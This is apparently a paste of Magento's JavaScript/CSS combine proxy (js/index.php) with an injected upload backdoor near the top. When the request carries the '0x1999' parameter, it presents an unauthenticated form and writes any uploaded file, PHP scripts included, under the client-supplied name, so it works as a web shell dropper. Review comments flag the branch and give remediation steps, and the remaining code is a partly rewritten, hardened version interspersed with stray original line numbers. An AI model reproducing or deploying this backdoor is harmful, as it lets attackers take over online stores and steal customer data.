cr1p

JS Magentot

Sep 13th, 2016
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magentocommerce.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magentocommerce.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Core
  23. * @copyright Copyright (c) 2008 Irubin Consulting Inc. DBA Varien (http://www.varien.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27. /**
  28. * Proxy script to combine and compress one or few files for JS and CSS
  29. *
  30. * Restricts access only to files under current script's folder
  31. *
  32. * @category Mage
  33. * @package Mage_Core
  34. * @author Magento Core Team <core@magentocommerce.com>
  35. */
  36.  
  37. // no files specified return 404
  // NOTE(review): this whole branch is an injected file-upload backdoor, not part of
  // the combine/compress proxy described in the file header. The vendor license and
  // docblock above it are unchanged, so the file looks stock at a glance, and the
  // "no files specified" comment directly above really belongs to the empty($_GET['f'])
  // check that follows this branch.
  //
  // What the visible code does:
  //   - It runs for any request whose query string contains the key "0x1999"; no
  //     login, token or source-address check is visible.
  //   - It prints an upload form that posts multipart data back to the same URL.
  //   - It stores the uploaded file under the client-supplied name with no extension,
  //     type or size check. The destination is a relative path, so it resolves against
  //     the process working directory (presumably this script's web-served folder;
  //     confirm for the SAPI in use). An uploaded .php file would then be executable
  //     by the web server.
  //   - It does not exit, so execution continues into the stock code below.
  //
  // Defender notes: compare this file against the vendor's original copy, since any
  // use of $_FILES / move_uploaded_file() here is foreign. Search the web server logs
  // for requests to this script carrying the "0x1999" parameter, POSTs in particular,
  // and review files created in the script's directory since the earliest such
  // request. Removing this branch alone is not sufficient remediation: whatever was
  // uploaded through it, and the access used to plant it, must be handled as well.
  if(isset($_GET['0x1999']))
  {
  // page styling and banner for the upload form
  echo "<body bgcolor=black>
<font color=cyan size=3>";
  echo "<h2>0x1999 Uploaded Area</h2><hr>";
  // empty action attribute: the form posts back to the URL it was served from
  echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">Filename:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"UPLOAD IT\">
</form>";
  // $_FILES["file"] is read without an isset() check, so a plain GET of the form
  // reads an undefined index here.
  if ($_FILES["file"]["error"] > 0)
  {
  echo "Error: " . $_FILES["file"]["error"] . "<br />";
  }
  else
  {
  // the client-supplied file name is echoed into the HTML without escaping
  echo "Upload: " . $_FILES["file"]["name"] . "<br />";
  echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "Stored in: " . $_FILES["file"]["tmp_name"];
  }
  // an existing file with the same name is not overwritten
  if (file_exists("" . $_FILES["file"]["name"]))
  {
  echo $_FILES["file"]["name"] . " already exists. ";
  }
  else
  {
  // arbitrary file write: the destination is the raw client-supplied name
  move_uploaded_file($_FILES["file"]["tmp_name"],
  "" . $_FILES["file"]["name"]);
  echo "Stored in: " . "" . $_FILES["file"]["name"];
  echo"<hr>";
  }
  }
  // Without an "f" parameter there is nothing to serve: reply 404 plus a usage hint.
  if (empty($_GET['f'])) {
      header('HTTP/1.0 404 Not Found');
      echo "SYNTAX: index.php/x.js?f=dir1/file1.js,dir2/file2.js";
      exit;
  }

  // false leaves the Content-type header to the web server
  $contentType = false;

  // "c" picks the content type: "auto" derives it from the file extension later,
  // any other value is taken as an explicit type
  if (isset($_GET['c'])) {
      if ($_GET['c'] === 'auto') {
          $contentType = true;
      } else {
          $contentType = $_GET['c'];
      }
  }

  // "f" arrives either as an array of paths or as one comma-separated string
  if (is_array($_GET['f'])) {
      $files = $_GET['f'];
  } else {
      $files = explode(',', $_GET['f']);
  }

  // content types a client may request explicitly
  // (image/gif, image/png and image/jpeg are commented out in the original list)
  $contentTypeAllowed = array('text/javascript', 'text/css');

  // file extensions that may be served
  // (the original list also carries commented-out entries 'gif', 'png' and 'js')
  $fileExtAllowed = array('js', 'css');
  104.  
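  $out = '';
  $lastModified = 0;

  // Resolve the confinement directory once. The trailing separator matters: a bare
  // prefix test against "<dir>" would also accept a sibling such as "<dir>_backup".
  // If the directory cannot be resolved, nothing is served at all.
  $baseDirReal = realpath(dirname(__FILE__));
  $baseDir = $baseDirReal === false
      ? null
      : rtrim($baseDirReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

  // extension => content type, consulted only when the client asked for c=auto
  // (gif/png/jpg mappings are commented out in the original table)
  $contentTypes = array(
      'js' => 'text/javascript',
      'css' => 'text/css',
  );

  foreach ($files as $f) {
      // nested f[][] arrays and other non-strings cannot name a file
      if (!is_string($f)) {
          continue;
      }

      // realpath() collapses "..", resolves symlinks, and returns false for
      // paths that do not exist
      $fileRealPath = realpath($f);
      if ($fileRealPath === false) {
          continue;
      }

      // check file path (security): only files below this script's directory
      if ($baseDir === null || strpos($fileRealPath, $baseDir) !== 0) {
          continue;
      }

      $fileExt = strtolower(pathinfo($fileRealPath, PATHINFO_EXTENSION));

      // check file extension against the allow-list (strict comparison)
      if (empty($fileExt) || !in_array($fileExt, $fileExtAllowed, true)) {
          continue;
      }

      // c=auto: take the content type from the first accepted file; afterwards
      // $contentType is a string and this branch is not entered again
      if ($contentType === true) {
          if (empty($contentTypes[$fileExt])) { // security
              continue;
          }
          $contentType = $contentTypes[$fileExt];
      }

      // append file contents; skip files that cannot be read instead of
      // emitting a stray newline for them
      $content = file_get_contents($fileRealPath);
      if ($content === false) {
          continue;
      }
      // every file must end with a newline so that concatenated sources do not
      // run into each other; add one here in case the author forgot it
      $out .= $content . "\n";

      $mtime = filemtime($fileRealPath);
      if ($mtime !== false) {
          $lastModified = max($lastModified, $mtime);
      }
  }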
  142.  
  143. //checking if client have older copy then we have on server
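  // check whether the client already holds a copy at least as new as ours
  if (function_exists('date_default_timezone_set')) {
      date_default_timezone_set('UTC');
  }
  // strtotime() returns false for an unparsable header value; comparing that false
  // directly with $lastModified could answer 304 for a garbage header, so it is
  // treated as "client has no usable cached copy" instead
  $ifModifiedSince = isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])
      ? strtotime($_SERVER['HTTP_IF_MODIFIED_SINCE'])
      : false;
  if ($ifModifiedSince !== false && $ifModifiedSince >= $lastModified) {
      header("HTTP/1.1 304 Not Modified");
      exit;
  }

  // last modified is the max mtime for loaded files
  header('Cache-Control: must-revalidate');
  header('Last-modified: ' . gmdate('r', $lastModified));

  // optional custom content type, can be emulated by index.php/x.js or x.css;
  // only values on the allow-list ever reach the header (strict comparison)
  if (is_string($contentType) && in_array($contentType, $contentTypeAllowed, true)) {
      header('Content-type: '.$contentType);
  }

  // remove spaces, default on (s=0 disables)
  if (!(isset($_GET['s']) && !$_GET['s'])) {
      $out = preg_replace('#[ \t]+#', ' ', $out);
  }

  // use gzip or deflate, use this if not enabled in .htaccess, default on
  //if (!(isset($_GET['z']) && !$_GET['z'])) {
  // ini_set('zlib.output_compression', 1);
  //}

  // add Expires header if not disabled (e=no), default 1 year
  if (!(isset($_GET['e']) && $_GET['e'] === 'no')) {
      $days = 365;
      if (isset($_GET['e'])) {
          // "e" is client-controlled. Arrays and non-numeric strings must not reach
          // the arithmetic below (a TypeError on current PHP versions); they count
          // as 0 days. The clamp keeps the timestamp inside the integer range that
          // gmdate() accepts, including on 32-bit builds.
          $days = is_numeric($_GET['e']) ? (float) $_GET['e'] : 0.0;
          $days = max(-3650.0, min(3650.0, $days));
      }
      $time = time() + (int) round($days * 86400);
      header('Expires: '.gmdate('r', $time));
  }

  echo $out;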